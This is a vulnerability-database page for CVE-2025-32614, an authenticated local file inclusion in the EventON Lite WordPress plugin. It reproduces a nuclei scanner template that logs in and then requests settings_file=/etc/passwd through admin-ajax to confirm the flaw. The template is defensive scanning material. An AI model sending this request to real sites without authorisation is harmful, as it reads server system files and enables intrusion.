Lucene search
K

EventON Lite <= 2.4 - Authenticated Local File Inclusion

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 5 Views

EventON Lite up to 2.4 has an authenticated local file inclusion vulnerability; update.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-32614
11 Apr 202508:50
circl
CNNVD
WordPress plugin EventON 安全漏洞
11 Apr 202500:00
cnnvd
CVE
CVE-2025-32614
11 Apr 202508:42
cve
Cvelist
CVE-2025-32614 WordPress EventON plugin <= 2.4 - Local File Inclusion vulnerability
11 Apr 202508:42
cvelist
EUVD
EUVD-2025-10757
3 Oct 202520:07
euvd
NVD
CVE-2025-32614
11 Apr 202509:15
nvd
Patchstack
WordPress EventON plugin <= 2.4 - Local File Inclusion vulnerability
9 Apr 202516:27
patchstack
Positive Technologies
PT-2025-16085
11 Apr 202500:00
ptsecurity
RedhatCVE
CVE-2025-32614
13 Apr 202509:20
redhatcve
Vulnrichment
CVE-2025-32614 WordPress EventON plugin <= 2.4 - Local File Inclusion vulnerability
11 Apr 202508:42
vulnrichment
Rows per page
id: CVE-2025-32614

info:
  name: EventON Lite <= 2.4 - Authenticated Local File Inclusion
  author: pussycat0x
  severity: high
  description: |
    Ashan Perera EventON contains a PHP remote file inclusion caused by improper control of filename in include/require statements, letting attackers include local files, exploit requires attacker to control include filename.
  impact: |
    Attackers can include arbitrary local files, potentially leading to code execution or information disclosure.
  remediation: |
    Update to the latest version of EventON or apply security patches to prevent file inclusion vulnerabilities.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/eventon-lite/eventon-241-authenticated-contributor-local-file-inclusion
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2025-32614
    epss-score: 0.01833
    epss-percentile: 0.76324
    cwe-id: CWE-98
  metadata:
    verified: true
    max-request: 3
    vendor: flavor
    product: flavor
    framework: wordpress
    publicwww-query: "/wp-content/plugins/eventon-lite/"
  tags: cve,cve2025,wordpress,wp-plugin,lfi,eventon,authenticated,wp

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/eventon-lite/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "EventON Lite")'
          - 'compare_versions(version, "<= 2.4")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - '(?i)Stable\s+tag:\s*([0-9.]+)'
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP+Cookie+check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=eventon_get_secondary_settings&settings_file=/etc/passwd

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'regex("root:.*:0:0:", body)'
        condition: and
# digest: 4b0a00483046022100d14e3d500c920ca4ef36bdb61e7ca83507d9129f87a996d540cf93617bd3aff5022100c87851dacc7ce7cfbd887c4efb69e79a7f9f62238d2e85e76a01989bc87d2d61:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation